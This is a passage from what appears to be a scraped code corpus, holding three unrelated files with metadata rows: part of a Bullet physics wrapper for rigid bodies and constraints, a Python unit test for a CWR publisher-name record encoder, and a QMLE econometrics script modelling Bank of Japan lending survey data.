fa, fb = t.frameInA, t.frameInB
frameInA = Transform(Quaternion(*fa[3:]), Vec3(*fa[:3]))
frameInB = Transform(Quaternion(*fb[3:]), Vec3(*fb[:3]))
out = azBullet.Generic6DofSpring2Constraint(
rb_a, rb_b, frameInA, frameInB
)
out.setLinearLowerLimit(Vec3(*t.linLimitLo))
out.setLinearUpperLimit(Vec3(*t.linLimitHi))
out.setAngularLowerLimit(Vec3(*t.rotLimitLo))
out.setAngularUpperLimit(Vec3(*t.rotLimitHi))
for ii in range(6):
if not t.enableSpring[ii]:
out.enableSpring(ii, False)
continue
out.enableSpring(ii, True)
out.setStiffness(ii, t.stiffness[ii])
out.setDamping(ii, t.damping[ii])
out.setEquilibriumPoint(ii, t.equilibrium[ii])
for ii in range(3):
out.setBounce(ii, t.bounce[ii])
else:
assert False
# Return the Bullet constraint body.
return out
# Compile a list of all Bullet constraints.
try:
constraints = [ConstraintMeta(*_) for _ in constraints]
out = [_buildConstraint(_) for _ in constraints]
except (TypeError, AttributeError, KeyError, AssertionError):
return RetVal(False, 'Could not compile all Constraints.', None)
# Apply the constraints.
fun = self.dynamicsWorld.addConstraint
for c in out:
fun(c)
# All went well.
return RetVal(True, None, None)
def clearAllConstraints(self):
"""
Remove all constraints from the simulation.
:return: success
"""
# Convenience.
world = self.dynamicsWorld
# Return immediately if the world has no constraints to remove.
if world.getNumConstraints() == 0:
return RetVal(True, None, None)
# Iterate over all constraints and remove them.
for c in world.iterateConstraints():
world.removeConstraint(c)
# Verify that the number of constraints is now zero.
if world.getNumConstraints() != 0:
return RetVal(False, 'Bug: #constraints must now be zero', None)
else:
return RetVal(True, None, None)
@typecheck
def compileCollisionShape(self, bodyID: int, rbState: _RigidBodyData):
"""
Return the correct Bullet collision shape based on ``rbState``.
This is a convenience method only.
fixme: find out how to combine mass/inertia of multi body bodies.
:param int bodyID: body ID.
:param _RigidBodyData rbState: meta data to describe the body.
:return: compound shape with all the individual shapes.
:rtype: ``CompoundShape``
"""
# Create the compound shape that will hold all other shapes.
compound = azBullet.CompoundShape()
# Aggregate the total mass and inertia.
tot_mass = 0
tot_inertia = Vec3(0, 0, 0)
# Bodies with virtually no mass will be converted to static bodies.
# This is almost certainly not what the user wants but it is the only
# safe option here. Note: it is the user's responsibility to ensure the
# mass is reasonably large!
if rbState.imass > 1E-4:
rbState_mass = 1.0 / rbState.imass
else:
rbState_mass = 0
# Create the collision shapes one by one.
scale = rbState.scale
for name, cs in rbState.cshapes.items():
# Convert the input data to a CollShapeMeta tuple. This is
# necessary if the data passed to us here comes straight from the
# database because then it it is merely a list of values, not (yet)
# a named tuple.
cs = CollShapeMeta(*cs)
# Determine which CollisionShape to instantiate, scale it
# accordingly, and apply create it in Bullet.
cstype = cs.cstype.upper()
if cstype == 'SPHERE':
sphere = CollShapeSphere(*cs.csdata)
child = azBullet.SphereShape(scale * sphere.radius)
elif cstype == 'BOX':
box = CollShapeBox(*cs.csdata)
hl = Vec3(scale * box.x, scale * box.y, scale * box.z)
child = azBullet.BoxShape(hl)
elif cstype == 'EMPTY':
child = azBullet.EmptyShape()
elif cstype == 'PLANE':
# Planes are always static.
rbState_mass = 0
plane = CollShapePlane(*cs.csdata)
normal = Vec3(*plane.normal)
child = azBullet.StaticPlaneShape(normal, plane.ofs)
else:
child = azBullet.EmptyShape()
msg = 'Unrecognised collision shape <{}>'.format(cstype)
self.logit.warning(msg)
# Let Bullet compute the local inertia of the body.
inertia = child.calculateLocalInertia(rbState_mass)
# Warn about unreasonable inertia values.
if rbState_mass > 0:
tmp = np.array(inertia.topy())
if not (1E-5 < np.sqrt(np.dot(tmp, tmp)) < 100):
msg = 'Inertia = ({:.1E}, {:.1E}, {:.1E})'
self.logit.warning(msg.format(*inertia.topy()))
del tmp
# Add the collision shape at the respective position and
# rotation relative to the parent.
t = azBullet.Transform(Quaternion(*cs.rotation),
Vec3(*cs.position))
compound.addChildShape(t, child)
tot_mass += rbState_mass
tot_inertia += inertia
return RetVal(True, None, (tot_mass, tot_inertia, compound))
@typecheck
def createRigidBody(self, bodyID: int, rbState: _RigidBodyData):
"""
Create a new rigid body ``rbState`` with ``bodyID``.
:param int bodyID: ID of new rigid body.
:param _RigidBodyData rbState: State Variables of rigid body.
:return: Success
"""
# Convert rotation and position to Bullet types.
rot = Quaternion(*rbState.rotation)
pos = Vec3(*rbState.position)
# Build the collision shape.
ret = self.compileCollisionShape(bodyID, rbState)
mass, inertia, cshapes = ret.data
# Create a motion state for the initial rotation and position.
ms = azBullet.DefaultMotionState(azBullet.Transform(rot, pos))
# Instantiate the actual rigid body.
ci = azBullet.RigidBodyConstructionInfo(mass, ms, cshapes, inertia)
body = PyRigidBody(ci)
# Set additional parameters.
body.setFriction(0.1)
body.setDamping(0.02, 0.02)
body.setSleepingThresholds(0.1, 0.1)
# Attach my own admin structure to the body.
body.azrael = (bodyID, rbState)
# Add the rigid body to the body cache.
self.rigidBodies[bodyID] = body
return RetVal(True, None, None)
| agpl-3.0 | 6,817,916,343,925,518,000 | 37.6 | 85 | 0.60327 | false |
weso/CWR-DataApi | tests/parser/dictionary/encoder/record/test_npn.py | 1 | 1526 | # -*- coding: utf-8 -*-
import unittest
from cwr.parser.encoder.dictionary import \
NonRomanAlphabetPublisherNameDictionaryEncoder
from cwr.non_roman_alphabet import NonRomanAlphabetPublisherNameRecord
"""
NPNRecord to dictionary encoding tests.
The following cases are tested:
"""
__author__ = 'Bernardo Martínez Garrido'
__license__ = 'MIT'
__status__ = 'Development'
class TestNPNRecordDictionaryEncoding(unittest.TestCase):
def setUp(self):
self._encoder = NonRomanAlphabetPublisherNameDictionaryEncoder()
def test_encoded(self):
data = NonRomanAlphabetPublisherNameRecord(record_type='NPN',
transaction_sequence_n=3,
record_sequence_n=15,
publisher_sequence_n=17,
ip_n='ABC123',
publisher_name='NAME',
language_code='ES')
encoded = self._encoder.encode(data)
self.assertEqual('NPN', encoded['record_type'])
self.assertEqual(3, encoded['transaction_sequence_n'])
self.assertEqual(15, encoded['record_sequence_n'])
self.assertEqual(17, encoded['publisher_sequence_n'])
self.assertEqual('ABC123', encoded['ip_n'])
self.assertEqual('NAME', encoded['publisher_name'])
self.assertEqual('ES', encoded['language_code'])
| mit | -9,134,457,041,738,474,000 | 36.195122 | 76 | 0.56918 | false |
yu45020/Social-Dynamics-in-Lending-Opinion | Codes/Japandata.py | 1 | 3468 | from MLE import *
data_path = '../Data/BOJ/'
output = '../Paper/Result/ModelResult/JP/'
#peer only
N = number_banks = 25
file_name = data_path+"BOJ data.csv"
dat = pd.read_csv(file_name)
year = dat['Year']
dat = dat.iloc[:,1]
y=dat.iloc[1:]
y=y.reset_index(drop=True)
x0=dat.iloc[:-1]
x0=x0.reset_index(drop=True)
y_act = np.insert(np.array(y),0,x0[0])
exog = pd.DataFrame(dat.iloc[:-1])
exog = exog.reset_index(drop=True)
add_con(exog)
qmle = QMLE(y, x0,exog,N)
result_M1 = qmle.fit(method='ncg',avextol=1e-12)
label_names = ['v'] + list(exog)
M1 = result_M1.summary(xname=label_names,title='M1')
result_params = result_M1.params
x_t_pred = predict(x0=x0,exog=exog,params=result_params,Num_bank=N,repeat=20)
df = {"DATE":year,"DICS Actual":y_act,"DICS M4 Predicted":x_t_pred}
out=pd.DataFrame(df)
out.to_csv('./img/BOJ M1 plot.csv',index=False)
write_latex(M1,output,'BOJ M1.tex','QMLE BOJ M1')
# M2/ M3(named as M4 full)
N = number_banks = 26
file_name = data_path+"BOJ complete.csv"
dat = pd.read_csv(file_name)
year = dat['Year']
dat = dat.iloc[:,1:]
y=dat.iloc[1:,0]
y=y.reset_index(drop=True)
x0=dat.iloc[:-1,0]
x0=x0.reset_index(drop=True)
y_act = np.insert(np.array(y),0,x0[0])
exog = dat.iloc[:-1,0:]
exog = exog.reset_index(drop=True)
exog = exog[['DICS', 'VJX',"Business Forecast ", 'NPL negative',"NPL positive","Bankrupt positive","Bankrupt negative",
"DIHRLD",
"Nikkei"]]
#"NPL positive", Nikkei
add_con(exog)
exog = exog[['DICS', 'VJX',"Business Forecast ", 'Nikkei',"RGDP_lag2 negative",
"DIHRLD"]]
qmle = QMLE(y, x0,exog,N)
result_M1 = qmle.fit(method='ncg',avextol=1e-12,maxiter=1000)
label_names = ['v'] + list(exog)
M1 = result_M1.summary(xname=label_names,title='M1')
result_params = result_M1.params
x_t_pred = predict2(x0=x0,exog=exog,params=result_params,Num_bank=N,repeat=40)
df = {"DATE":year,"DICS Actual":y_act,"DICS M4 Predicted":x_t_pred}
out=pd.DataFrame(df)
out.to_csv('./img/BOJ M2 no badloans plot.csv',index=False)
write_latex(M1,output,'BOJM4.tex','QMLE BOJ M4')
#forward
qmle = QMLE(y.iloc[:40], x0.iloc[:40],exog.iloc[:40,],N)
result_M1 = qmle.fit(method='ncg',avextol=1e-12,maxiter=1000)
result_params = result_M1.params
x_t_pred = predict2(x0=x0,exog=exog,params=result_params,Num_bank=N,repeat=40)
df = {"DATE":year,"DICS Actual":y_act,"DICS M4 Predicted":x_t_pred}
out=pd.DataFrame(df)
out.to_csv('./img/BOJ M2 first 70 plot.csv',index=False)
# back
## back
qmle = QMLE(y.iloc[10:], x0.iloc[10:],exog.iloc[10:,],N)
result_M1 = qmle.fit(method='ncg',avextol=1e-8,maxiter=1000)
result_params = result_M1.params
x0_1 =x0.iloc[10:].reset_index(drop=True)
exog_1 = exog.iloc[10:,].reset_index(drop=True)
x_t_pred1 = predict2(x0=x0_1,exog=exog_1,params=result_params,Num_bank=N,repeat=20)
x0_back =x0.iloc[10::-1]
x0_back.reset_index(drop=True,inplace=True)
exog_back=exog.iloc[10::-1,]
exog_back.reset_index(drop=True,inplace=True)
x_t_pred0 = predict2(x0=x0_back,exog=exog_back,params=result_params,Num_bank=N,repeat=20)
x_t_pred0=pd.DataFrame(x_t_pred0)
x_t_pred0=x_t_pred0[1:-1]
x_t_pred0 = x_t_pred0[::-1]
x_t_pred = pd.concat([x_t_pred0,pd.DataFrame(x_t_pred1)],ignore_index=True)
df = {"DATE":year,"DICS Actual":pd.Series(y_act),"DICS M4 Predicted":x_t_pred}
out=pd.concat(df,axis=1)
out.to_csv('./img/BOJ M last 65 plot.csv',index=False)
| gpl-3.0 | -6,536,490,217,122,991,000 | 28.156522 | 119 | 0.656863 | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.